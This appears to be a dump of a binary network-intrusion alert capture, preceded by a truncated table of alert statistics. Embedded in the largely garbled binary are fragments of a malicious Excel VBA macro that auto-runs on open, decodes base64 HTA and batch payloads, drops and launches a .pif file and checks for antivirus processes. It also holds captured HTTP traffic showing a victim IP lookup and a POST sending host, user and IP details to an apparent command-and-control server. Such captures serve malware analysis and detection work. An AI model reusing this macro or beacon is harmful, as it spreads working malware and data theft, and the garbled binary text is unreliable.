  10       2024650      1        1        1816232      0.40   99       0        412036      18345.78    0.00        18345.78   
  11       2024771      1        1        2898854      0.65   395      0        391877      7338.87     0.00        7338.87    
  12       2820267      1        2        818346       0.18   31       0        359146      26398.26    0.00        26398.26   
  13       2809306      1        4        3066580      0.68   24       0        350086      127774.17   0.00        127774.17  
  14       2819930      1        2        856222       0.19   4        0        299119      214055.50   0.00        214055.50  
  15       2819664      1        2        851563       0.19   4        0        288153      212890.75   0.00        212890.75  
  16       2819940      1        3        6947973      1.55   43       0        245159      161580.77   0.00        161580.77  
  17       2802067      1        6        186438       0.04   1        0        186438      186438.00   0.00        186438.00  
  18       2012520      1        7        175125       0.04   1        1        175125      175125.00   175125.00   0.00       
  19       2020865      1        3        170885       0.04   1        0        170885      170885.00   0.00        170885.00  
  20       2803027      1        6        606205       0.13   7        0        159924      86600.71    0.00        86600.71   
  21       2018342      1        2        4144574      0.92   36       0        144529      115127.06   0.00        115127.06  
  22       2804907      1        3        206664       0.05   4        0        140883      51666.00    0.00        51666.00   
  23       2801930      1        7        685759       0.15   9        0        125113      76195.44    0.00        76195.44   
  24       2803657      1        5        248915       0.06   3        0        121977      82971.67    0.00        82971.67   
  25       2802035      1        4        119951       0.03   1        0        119951      119951.00   0.00        119951.00  
  26       2816327      1        4        2107971      0.47   55       0        117657      38326.75    0.00        38326.75   
  27       2815568      1        2        877271       0.20   27       0        113460      32491.52    0.00        32491.52   
  28       2801929      1        7        587504       0.13   9        0        112077      65278.22    0.00        65278.22   
  29       2021418      1        9        1284183      0.29   27       0        107281      47562.33    0.00        47562.33   
  30       2022543      1        1        9019442      2.01   626      0        107126      14408.05    0.00        14408.05   
  31       2816929      1        4        2242026      0.50   55       0        105470      40764.11    0.00        40764.11   
  32       2816940      1        2        3114163      0.69   55       0        104483      56621.15    0.00        56621.15   
  33       2804911      1        3        386280       0.09   5        0        104041      77256.00    0.00        77256.00   
  34       2816909      1        2        3131879      0.70   55       0        102029      56943.25    0.00        56943.25   
  35       2816509      1        2        617789       0.14   7        0        101788      88255.57    0.00        88255.57   
  36       2018666      1        4        14018303     3.12   445      0        100425      31501.80    0.00        31501.80   
  37       2819939      1        2        626368       0.14   7        0        98386       89481.14    0.00        89481.14   
  38       2802876      1        3        411280       0.09   18       0        98002       22848.89    0.00        22848.89   
  39       2804927      1        2        189435       0.04   4        0        97795       47358.75    0.00        47358.75   
  40       2804906      1        3        184335       0.04   3        0        97526       61445.00    0.00        61445.00   
  41       2022303      1        3        514542       0.11   6        0        94106       85757.00    0.00        85757.00   
  42       2820983      1        5        1303011      0.29   25       0        92866       52120.44    0.00        52120.44   
  43       2022502      1        4        2560513      0.57   54       0        91678       47416.91    0.00        47416.91   
  44       2821471      1        2        1219174      0.27   27       0        90719       45154.59    0.00        45154.59   
  45       2019343      1        3        1572439      0.35   53       0        89633       29668.66    0.00        29668.66   
  46       2821839      1        2        441262       0.10   6        0        88149       73543.67    0.00        73543.67   
  47       2828986      1        2        1620462      0.36   50       0        85130       32409.24    0.00        32409.24   
  48       2819978      1        5        1548771      0.34   25       25       85110       61950.84    61950.84    0.00       
  49       2014703      1        9        13481468     3.00   1436     0        84928       9388.21     0.00        9388.21    
  50       2830425      1        1        636412       0.14   13       0        84639       48954.77    0.00        48954.77   
  51       2811399      1        2        482335       0.11   12       0        83974       40194.58    0.00        40194.58   
  52       2021248      1        7        86930        0.02   2        0        83664       43465.00    0.00        43465.00   
  53       2803000      1        2        82043        0.02   1        0        82043       82043.00    0.00        82043.00   
  54       2815659      1        3        526969       0.12   12       12       78853       43914.08    43914.08    0.00       
  55       2022901      1        2        1192616      0.27   27       0        78015       44170.96    0.00        44170.96   
  56       2020181      1        8        1002001      0.22   27       0        77510       37111.15    0.00        37111.15   
  57       2826281      1        2        11552921     2.57   810      0        76484       14262.87    0.00        14262.87   
  58       2018316      1        4        14407601     3.21   445      0        75757       32376.63    0.00        32376.63   
  59       2807970      1        8        1171805      0.26   27       0        75331       43400.19    0.00        43400.19   
  60       2020855      1        3        2417817      0.54   53       0        74996       45619.19    0.00        45619.19   
  61       2020741      1        1        13909208     3.10   445      0        74961       31256.65    0.00        31256.65   
  62       2816910      1        2        2952364      0.66   55       0        73732       53679.35    0.00        53679.35   
  63       2809363      1        3        1154074      0.26   27       0        73185       42743.48    0.00        42743.48   
  64       2020742      1        1        13748650     3.06   445      0        72885       30895.84    0.00        30895.84   
  65       2816925      1        3        1711851      0.38   55       0        72270       31124.56    0.00        31124.56   
  66       2816526      1        13       1542252      0.34   55       0        68146       28040.95    0.00        28040.95   
  67       2017261      1        3        1133081      0.25   27       0        67809       41965.96    0.00        41965.96   
  68       2819993      1        2        1207666      0.27   25       0        67382       48306.64    0.00        48306.64   
  69       2019094      1        5        1198287      0.27   29       0        67304       41320.24    0.00        41320.24   
  70       2820851      1        5        2082239      0.46   55       0        66970       37858.89    0.00        37858.89   
  71       2809850      1        2        6334244      1.41   302      0        66413       20974.32    0.00        20974.32   
  72       2017259      1        12       1291326      0.29   25       0        65133       51653.04    0.00        51653.04   
  73       2022545      1        1        2176126      0.48   147      0        63939       14803.58    0.00        14803.58   
  74       2815254      1        7        1013946      0.23   22       0        63096       46088.45    0.00        46088.45   
  75       2802991      1        5        300187       0.07   6        0        62873       50031.17    0.00        50031.17   
  76       2828060      1        4        1554952      0.35   51       0        62845       30489.25    0.00        30489.25   
  77       2816930      1        4        1619932      0.36   55       0        62521       29453.31    0.00        29453.31   
  78       2810991      1        4        1238649      0.28   25       0        62272       49545.96    0.00        49545.96   
  79       2803760      1        3        11944799     2.66   810      0        61933       14746.67    0.00        14746.67   
  80       2812141      1        2        762974       0.17   25       0        61783       30518.96    0.00        30518.96   
  81       2810607      1        8        894200       0.20   22       0        61213       40645.45    0.00        40645.45   
  82       2821569      1        7        987971       0.22   27       0        60985       36591.52    0.00        36591.52   
  83       2008120      1        4        4177484      0.93   1436     0        60839       2909.11     0.00        2909.11    
  84       2812433      1        2        1029739      0.23   27       0        60198       38138.48    0.00        38138.48   
  85       2815477      1        6        286234       0.06   7        0        59790       40890.57    0.00        40890.57   
  86       2804626      1        9        1215166      0.27   55       0        59670       22093.93    0.00        22093.93   
  87       2811544      1        1        665947       0.15   46       0        59228       14477.11    0.00        14477.11   
  88       2801861      1        1        87648        0.02   2        0        58966       43824.00    0.00        43824.00   
  89       2014411      1        11       116808       0.03   2        2        58745       58404.00    58404.00    0.00       
  90       2024606      1        2        616870       0.14   27       0        58653       22847.04    0.00        22847.04   
  91       2017552      1        6        4786349      1.07   312      0        57502       15340.86    0.00        15340.86   
  92       2816924      1        4        1548970      0.34   55       0        57474       28163.09    0.00        28163.09   
  93       2021038      1        4        773921       0.17   25       0        57345       30956.84    0.00        30956.84   
  94       2819673      1        4        1632633      0.36   55       0        56918       29684.24    0.00        29684.24   
  95       2025064      1        5        2154923      0.48   55       0        56913       39180.42    0.00        39180.42   
  96       2816927      1        3        1880535      0.42   55       0        56812       34191.55    0.00        34191.55   
  97       2824971      1        3        107769       0.02   2        0        56807       53884.50    0.00        53884.50   
  98       2829848      1        2        1464961      0.33   50       0        56733       29299.22    0.00        29299.22   
  99       2014967      1        3        646848       0.14   27       0        56595       23957.33    0.00        23957.33   
  100      2815886      1        2        1079776      0.24   40       0        56513       26994.40    0.00        26994.40   
  101      2809511      1        4        965805       0.22   27       0        56388       35770.56    0.00        35770.56   
  102      2010142      1        4        2670325      0.59   957      0        55708       2790.31     0.00        2790.31    
  103      2014701      1        12       18241070     4.06   1436     0        55210       12702.69    0.00        12702.69   
  104      2816768      1        2        818808       0.18   25       0        54937       32752.32    0.00        32752.32   
  105      2816931      1        3        1550311      0.35   55       0        54669       28187.47    0.00        28187.47   
  106      2010143      1        3        3610415      0.80   957      0        53962       3772.64     0.00        3772.64    
  107      2812337      1        3        450367       0.10   53       0        53822       8497.49     0.00        8497.49    
  108      2819790      1        3        89179        0.02   2        0        53588       44589.50    0.00        44589.50   
  109      2816895      1        2        53583        0.01   1        0        53583       53583.00    0.00        53583.00   
  110      2822979      1        3        53424        0.01   1        0        53424       53424.00    0.00        53424.00   
  111      2826156      1        2        700247       0.16   32       0        53407       21882.72    0.00        21882.72   
  112      2802822      1        1        1667478      0.37   573      0        53336       2910.08     0.00        2910.08    
  113      2816356      1        2        1936152      0.43   48       0        52936       40336.50    0.00        40336.50   
  114      2025086      1        6        52868        0.01   1        1        52868       52868.00    52868.00    0.00       
  115      2816928      1        3        1839571      0.41   55       0        52821       33446.75    0.00        33446.75   
  116      2816525      1        10       1855497      0.41   55       0        52805       33736.31    0.00        33736.31   
  117      2809859      1        6        1309837      0.29   47       0        52579       27868.87    0.00        27868.87   
  118      2015877      1        6        864343       0.19   27       0        52195       32012.70    0.00        32012.70   
  119      2821561      1        2        1379637      0.31   47       0        52134       29353.98    0.00        29353.98   
  120      2024573      1        2        595998       0.13   25       0        51722       23839.92    0.00        23839.92   
  121      2021413      1        2        969555       0.22   27       0        51655       35909.44    0.00        35909.44   
  122      2816669      1        4        1061837      0.24   47       0        51628       22592.28    0.00        22592.28   
  123      2815817      1        5        1603112      0.36   55       0        51598       29147.49    0.00        29147.49   
  124      2815363      1        3        909112       0.20   25       0        51521       36364.48    0.00        36364.48   
  125      2820919      1        2        5

This file has been truncated. Go here to download in full.


unified2.alert.1548933118 - (51136 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
4\?n+ßfÑý/J·
ePÀ\?n+\?n+ßfêEÜh¶/J·
ePÀPU2(‚w5”T»vVk£â’Ú,Z…Àµ‚‘Tœq•:
)7Õ÷‚°V¨ø!40¨ªse_ô.è:+V ¸šÞ€Eżµƒ‘ëe¸šÞ£OV˾¬üy4• À¬h«滢­%w<®XێzºA«NYÁȃ¨Š(e¨Ã[Ö¢250[èÙ¡ŽÒŒ°Xt<OGøѱÎTh9)½bÔoXòù«!@€Ù"@¥¶Z±<#Àj)ˆC%ÁÈkq
麪Чü'	Ž À¬ ÔWMgk€Ußw35ÀÁL
PÖþŠ²XtÿE€³M€2fmÃoÙŽÆFlÊ`äq õÿ•åk­G!1 x9ÔA†äÐoØоŒëQüF%À$¹5
\C"úµÜàυf}ÙîUó]Ջç—3TSb*aY	0Œ\uúÅuB]}ôfÝ/òWC€ý/ÀR1t-,9„VԌ{¤è‹nUªÎFnV‚(ñÅ3ÿ¼$Ì: @€þ  @@€€  @@€€  @˜m¼ýÖÅK.ÝʗŽæ–o¿uْKˆ掯[¼lÉmˆæ„oX¼ì’å>ˆæ‚o—îhD€ù êhD€¹`2ԁ ÀÜ`f¨"@€9!À®Ý‡ @ŽØv¨"@€ü
p’¡ˆr)Àn†: ț§Ö݇ @>8
îC€`Ö	°ÕŠ6ˆr.ÀÛoX|Ý}ÌN^ÙPD€³S€×Ý:=Ý}Ì&N×PD€³I€Ó:ԁ ÀlàÔW´!@\="ÞºìŠA¥`v
pٕä±|¹z¹mñ´}Žk‹Ž×"çÛ^ì—ÒW•ü©Ý¼õ»F-›‡õ@ '|øiÇq6¯ž)L› 8½Üí<}ÏÀÀêÍ{vϔ¦ëwyÅœ4Ñ°Ã!@€ðçûêu÷æ§gL€Ë èGÞ¿ÙÔïž)^B€ øÈ÷í#ç¾û6;Ξ»¥«%Gªj¢ì&¼wºÎx·³:údùÖ@ÕF€/wœGäÛB¡.’…âç^q*ê‘\©“Jè8å׉¤'Ê¥ZòQ|©ô…8NÙ3:òâ³RUgè8ŠeyY¹¦Ô%³­Ä}€ŽÄ×}€Ǔשú–EÇúâ+ŽúJ‰+­Ê¥ŠV2·ÕÚézº°V–eõŒË~
ôB€»ûLM´={¸gÏ#[ø/kËv?í|*,÷ˆ8{÷æ=q¥ñ‘èe·þd÷ré¾fn~Dä}¿¼È«"ÝàšŠXØ(rUˆ«ž(K6œA¡„Ð/F‡Ö¥'½‚^¤/k…Š¢BF€aPŒ’:
)Á ‰êbZ€a£åàÉÌka˜ ÒfÆLŠl•«*¯¬–Zê¶Qµ±.ïÚ¬"šJ£žªî\¹ÿ  ÀËë¼µ¦MluIDATÏn²:›w++*›Teøþ=Re»UÒÕqcùS™è‘ûÅ'ZŠO6ÐyX½ˆ$®n>–­€p[5hhGÔbÛ¸q"-eIë҂#E$®‹UVö«ªnåªT50 «sðúyǖTŸ
ÊÄ%U°ªŸ «_"yYE¶É©Æ÷²n«‹ªkˆâi–˺I^×t¥æ @?PÛkøuÕxŸ³ûáèìÓq§ž/ùTøía¥Âñz_«&°zù¾¨/VÜÈJÂ	J?ußÈ¢7‚AA›ª;¢.ÎX—–\?n+\?n+ßfzElj&/J·
ePÀP'Æ]fò´TI-zß(ÇJ:Ú´©äe•H0~KªvkUfԓ%¬˜úª¼Ö*²U®Há®kß6z­Æ²3¬Eå)…ê*ÓÓˆN›——µ¨ô È}º*—Œ—¬vî:Ü£ìhúÛ	pµ#û/4ʑôJZxft"ª6ISD´ddPjDÿ£u$TÖ)zIR#¡ö”Ç^j)@™V^›-r”<J^ö¶ZÕÉ\C#ÀAk0Åq½H™ '}€«S}€F€^"ÀÕNÄfë"u¡”›®ÞßY€µ’ÎAµ7#	4âl#›ñû´­K#½T„øt},/0¬ÅIº`2:ÓB€n$@»ÈV¹
®8nÔR·5âÌ
ÐMNR"@€0;
ܺ¸»yîÌjy²Û`M‘j¹ˆÚ_©µm|3bо4à ©Vãål
p0UGë¦ØA€õ¸˜9õH5<h߶Ë`5« WLÏL÷>üý‡£&°½zäî=÷«¾¿OMCúálø–\ê~5
rƒôS6­h_긦gM÷¦™áÓzPÈôšžµÁ(Õ$¬:n‡>ÀrÔ˜Ù*—«oZíÛ¦úÝJs`ÑU÷õü2蕓• ËRŒG7ëÆqš=˵î¬QàÝjƟ¨¶`¨Ü°ÖœºpÍØ¢’øÌ }©S6…z<µ‘\[Ô²3£À~\±RƒÆr–‹Y6§X(k£…-FÕh‹6E¶Ê¹PöC&·îíÆ^n.éûւè‘Emny²Ø š8p¿Ý=è$f¼DXMWõ<À§•
¿/ÇSVon%@5=ÅõËZ.å¨×oP½ÖM“°.uáIX´/uürf œÂìª9ƒ²R™š([¨•°TÐÓö*É<@ñQ+Ö==ϱ*’G_kÍŒ‹l•«¦fR—”,“Ûêjžº^V 3ó½²Ï¬$3! ÀUàÀÃ÷'»ÁXÔ+AÔ"½ÞcÏêc'ÉJ=Xòô=›[
‚¸j©DÔ-FÚQË*œr%i1úr|ÁK	оÔ)ʕ a­Z	¢Wc處 zj‹^	R6¬ˆ÷µ&F+Ad+×à ¼C£Z°W‚è"[媩b3·ÕŒWŽdW‚¨õ+º‚9è” @x9ûÞ''ÂtÏ,ú®¥kÉÜìÊ,)6xõØÜ+˜Veל lóñê¦qáPæz¡ìšk¸¶à÷dùH~Xmñ&-0‡¸øR+¢4·ubÖöÎR  À«32àí’ÜŠ D€@€€fdÏΊãTfV€Ó0ðZœËØe¾<ÅM	äŒé®â+]•¡dð²vƒ1[Ø4\?n-
A *â3/J·
ePÀN\?n-\?n-
A 2E$in/J·
ePÀP8'§"€ €	ÿÿÿÿ€	ÿÿÿÿ0€	ÿÿÿÿ€	ÿÿÿÿ€8€PXh€	ÿÿÿÿ
ˆ€	ÿÿÿÿ€˜€	ÿÿÿÿ€	ÿÿÿÿ €°€À€ȁЀ	ÿÿÿÿ8à€	ÿÿÿÿ€  €	ÿÿÿÿ€@H€	ÿÿÿÿ€	ÿÿÿÿ`pˆ˜
¨€	ÿÿÿÿ&¸à€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ,&@€	ÿÿÿÿ€	ÿÿÿÿŒh€	ÿÿÿÿø€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ&(BP€	ÿÿÿÿ€	ÿÿÿÿ˜ ¨&ȁBð€	ÿÿÿÿ8@€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿH&hB€	ÿÿÿÿØà€	ÿÿÿÿè@ <` $¨Ð€	ÿÿÿÿ€	ÿÿÿÿèð	ø@0<p°$¸à€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿø	N\?n-\?n-
A 2E$in/J·
ePÀP¬•$	€	ÿÿÿÿ€	ÿÿÿÿš0	€	ÿÿÿÿÐ	€	ÿÿÿÿ"Ø	€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿà	€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ"è	€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿð	€	ÿÿÿÿ€	ÿÿÿÿBø	€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€
€
€	ÿÿÿÿ€	ÿÿÿÿ

 
8
P
`
€	ÿÿÿÿp
x
€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€
€	ÿÿÿÿB…ˆ
€	ÿÿÿÿ€
˜
€	ÿÿÿÿ°¨
X€	ÿÿÿÿ€	ÿÿÿÿx€	ÿÿÿÿÿÿÿÿˆ–]õXõpõˆþ¹.com'p p'n]õ õ¸õÐ]õè `!|!d'z¹ZXhl$€ ‚$~'vx¹6'tÿÿ]õ j!J!d'„]õõ0ÿÿ]õH]õ` j!|!d'Œð \!J!d \!’!d `!’!d %.Ž]õx `!J!d$€ ‚$~'”]õ¹PGh¹	0bWw+DQo8¹äaGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPgN\?n-\?n-
A 2E$in/J·
ePÀPÕF0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i$€ ‚$~'–º „$˜œ¹1.hta¬«Ï¬Õ –Ù¬Õ ”Ù¬V"óþ¹6fsdFfa p t¹. vȹ1.hta¬º ŽB@š|ÿÿkÿÿº¹PS¹UAM¹ain Œ$˜œ¹6fsdFfa p t¹. vȹ4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA==$€ ‚$~ z$€ ‚$~$B¹XDYuZXhl$€ ‚$~ žA@œ|ÿÿ0kÿÿ(º¹n360 Œ$˜œ¹6fsdFfa p t¹. vÈ z$€ ‚$~$B¹XDYuZXhl$€ ‚$~ žA@œ|ÿÿkÿÿˆº¹PccNT Œ$˜œ¹6fsdFfa p t¹. vÈ z$€ ‚$~$B¹XDYuZXhl$€ ‚$~ žA@œ|ÿÿðkÿÿ躹uiSeAgnt Œ$˜œ¹6fsdFfa p t¹. vÈ z$€ ‚$~$B¹XDYuZXhl$€ ‚$~ žA@œ|ÿÿPkÿÿHº¹mbam Œ$˜œ¹1s.bat4\?n/ÃJ*â3/J·
ePÀN\?n/\?n/ÃJ2E$in/J·
ePÀP¨Ø¬«Ï¬Õ¹cGluZyBsb2NhbGhvc3QgLW4gNjA=$€ ‚$~Ø žÙ¬Õ¹c3RhcnQgJXRlbXAlXDYucGlm$€ ‚$~Ø žÙWÿÿˆ¹6fsdFfa n¹6¹.pifȹ1s.bat žA@œ|ÿÿ@kÿÿ8º¹mbamtray Œ$˜œ¹1s.bat¬«Ï¬Õ¹cGluZyBsb2NhbGhvc3QgLW4gNjA=$€ ‚$~Ø žÙ¬Õ¹c3RhcnQgJXRlbXAlXDYucGlm$€ ‚$~Ø žÙWÿÿ¨¹6fsdFfa n¹6¹.pifȹ1s.bat žA@œ|ÿÿ`kÿÿX¹6fsdFfa n¹6¹.pifȹ4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA==$€ ‚$~ z$€ ‚$~$B¹X¹DYuc¹Glm$€ ‚$~ žA@œoÿÿˆ–¨oÿÿx–oÿÿh–X]õø]õðÉ.¦ð¹b64 ¦%®.ª¹
bin.base64 ª(° ¤ ª(d ª!²'€ð².ªð².¦iÿÿØú¹.–8]õDØð¹*SELECT * FROM Win32_Process WHERE Name = ' ´¹'¹w¹in¹mg¹mts¹$:{impersonationLevel=impersonate}!\\ ¶¹\root\cimv2$º%¼.¸ ¸!¾¬›Gº'˜jiÿÿàÿÿÿÿØÿÿÿÿ8·Attribute VB_Nam@e = "v"
Sub closee()
Dim pl, kk, gdfs€fsa
kkd.com^

È
pl kkdllfjgf, @tyretw*a`ax
l\?n/\?n/ÃJêEÜh¶/J·
ePÀP$.UserForm3.TextBox22
6StrConv(DecodeBase64("ZXhl"), vbUn.i¢Ql"6±jddsdf@da As HiLngš= ?5
?1?yrtfdsad4cxv xczcvƒ`mb bmbdfnu€chevi
j†*j€«et wshVBA.CreateObjðect(…EA…ü &†R†ƒ–ˆŸ‚‡ alhjxvôcv¸ €=«ÅÆƒÎYkkkWÁ€ÁU"PGh"@)"0bWw+DQo8BaGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCIgICAÆV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KÄ8L1NDU0klQVÃÁ8dGl0bGU+QXBwbGljYXRpb24gR€–Y3V0ZXI8L3RpdGxlPgÄDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIg:Æ*IEFQUExJQ0FUSU9OTkF NRT0iØiIÇ.ÀBCT1JEˆRVIÀ5vIÅ"5ÂCBÀ BÂÀLubyIÁTÆU0hPV0lOVEFTS0JBUj0ieWVzÌTSU5HTEVJTlÀNUQU5DáñWVNNRU5VA`
5ZXMiêFa,9MTD0ib(m8iÍs AoIf Tru!IsE@xeRunn€r(åq) Then

Open "1@.hta" €ƒ @OutputÁx#1
  Priànt #1’ãPiùH^ CA˜ ¡@✀"6fsdFf`^&š¡
à”¡T.¡Sj6gàz t. …, 0, False
Exit Sub"
End Iùà  â€`ˆ"PS`UAMâxainá‡ÅŸ ƒ‚!*  SheàžSò¤Y21kLmV4ZSAvYyAgcGgyBsb2NhbGhvc3QgLW4gMTAwICYm0IA==7À"EnÀviron(R¡¸
„) “XDYu㷁¸Hid+Y+a*A,àâ.á”I"n3ü60¿*V?ã)Ÿ¥ÏŸ«*‰ÔµPcc¼NTßÖ '?(oÿo´xo€z"!oÀ3C,Ð3²A"uiS eAgnt?
2þkß<Ó9?^…???ß8ˆY_BUB0 ÿAƒPà"mbamOPáTQs.baÀoQ)P8a“ï?ã?NjAl?§_͘c3RhcnQgJXRlbØXAl!m//!þ CYr< ¤Àš0œ°À".pif"ô>ü"1ã©4àTÁ‡%ƒ%±trayÿÿÿohghÿÿçVÿßÿÁm_Rÿuÿ÷Bpÿl3ÿdeÿÿ`’q;O.@.//°Âÿ°k¾kkk1%Yð#?\8Äß>X•""Ðkc‚Gl¯-îb¥-À( Sá0ÔðfadfÔñ3PÏÀpˆlkkÏ

ð&và Fun@ction ZÑByVal str(Dat(Ï)BytrÜÒ\?n/\?n/ÃJêEÜh¶/J·
ePÀP€ÁòÂÁobjHXMLMS€2.DOMDocuÐmentZN0]hÆIÀ Ele—ñ

á6SÎt= Ne<w ¯£„¢= #.cф("bx64"°Ìq¡.Ñ
TypâêbinÿÐP1ádBE±ä@ÉĤ·(ä°¥n 
ñdÐu`ˆ±
 othÿäK•`Q%ñPublicWº¯q°"36ê, Op#ÑÁCom€¯er%±Sðúng".‚"Cooleað²ã
aÙ@
Proceðssesq
@Ãåqˆ@ô°cesses = GetObject("w" & "in0mgts:{impersonationLevel=A$e}!\\PsComputer”\root\cimv2").ExecQuery("SELECT * FROM Win32_Pro” WHERE  Name'S9'")
 If obj4es.Count <> 0 T@hen Is5R@unningHT rue
EnÀd Funcc~~H"QVè¾â'ôSHŸ‘!€Cڜ	ãÿÿÿÿÿÿÿÿ	ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿƒŠ !ÿÿÿÿÿÿÿÿÁ
ñ
ÿÿ¡ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÑÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ1ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿQÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ¡ˆ Aÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ¡ÁáÿÿÑq\?n/\?n/ÃJêEÜh¶/J·
ePÀP,‹¡A	
VBAProjectbbbbÝòàÊíèãà	UserForm7	UserForm1Ëèñò1	UserForm3nnnnnn	UserForm5vvvvvvvïÀF1C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLLVBA
ñÿÿÿÿÿÿÿÿ	!¡°ÀF4C:\Program Files\Microsoft Office\Office15\EXCEL.EXEExcel
¡ÿÿÿÿÿÿÿÿÑQÐ0ÀFC:\Windows\system32\stdole2.tlbstdole
ÿÿÿÿÿÿÿÿ1ðLÐø-ú[½åªDÞR?C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLLOffice
1ÿÿÿÿÿÿÿÿañá.E
à….`ŒM´C:\Windows\system32\FM20.DLLMSForms
¡¡Ñ!	0 ˜^»—!•DÖþÇô#×2C:\Users\444555\AppData\Local\Temp\VBE\MSForms.exd
Ñ	¡
!	P&\?n/\?n/ÃJ
Eük–/J·
ePÀP¶ÞõQÅÓ‰¹øâ!C:\Windows\System32\msxml3.dllMSXML2

ÿÿÿÿÿÿÿÿA‘pÚÀFümo+WôDŸ‰r݋
.ÀFs£hLk‚A¨BÂ\´ßiDÀFWorkbook
Workbook_OpenHexToString
x.closeefadfkklkDecodeBase64IsExeRunning
rU@@@@~zÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ4\?n¼þgÚm!
ek×ÀPö\?n¼\?n¼þgÚEÌ]œ
ek×ÀPP=†GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

4\?n½ºŒ+Š
eMH†§ÀPÂ\?n½\?n½ºŒ¦E˜Ë
eMH†§ÀPP¢POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ledbabdintot.com
Content-Length: 119
Cache-Control: no-cache

GUID=4520674659239663104&BUILD=16uye01&INFO=MULTIFACETED-PC @ MULTIFACETED-PC\amaze&IP=173.66.46.91&TYPE=1&WIN=6.1(x64)4\?n¿mI+e2W’S
ePÀN\?n¿\?n¿mI2E$ÖÄ2W’S
ePÀP¹Ë "¤å—ÀGKŠí }N‡)É@©´Pì8×æô^­ÉЮ‰vÿ](õ
Íê«éO
ˆP¬½ŽJ”@ÇV>¦ÕíD>]> H5X£H*¥ÈSoeÀ`©ž{)ለ‰¿b—šcç¾>ªÄ
#‹ÕÌDQŒŠªIat#úõ­üÌI×êZÕÈñ*Ö>Š‘‹Õ4óª‰K5NéÔY끨q¶Mu*¡ãÀ
Uìˆl+ªV~¬íOÂi…îÔ~!©ÁqNó‰K2õ”ty-=‚ƒÕtQU$w€¨T8V2k­®õ·H›Ì2NÝfA{¾VP 2HZ¼ŠN¨[‹l¼+±i.£+Ñ°‚ÌBâéý\`ÀÀI:¸Jõ	J
íù£RjáíùT>ÍêKø½ÐUB)#D©ÐçÄL
íå´U9ÀH׳Ô'Ï(PôïHikÛÒ¯´è=€oP¼+×hAh‰4Q=ŸÁá€a~KVU¢€Ü1«>ÅÀ¢sTõ·“öóÞõ¾´UÊ>ŠÉb’G)ۀ°uS[×=ɀÕñT?Ú×d }ÜX•tE†¨T HÃKÇ(*TO Ò€Üw¡ΰ¨„
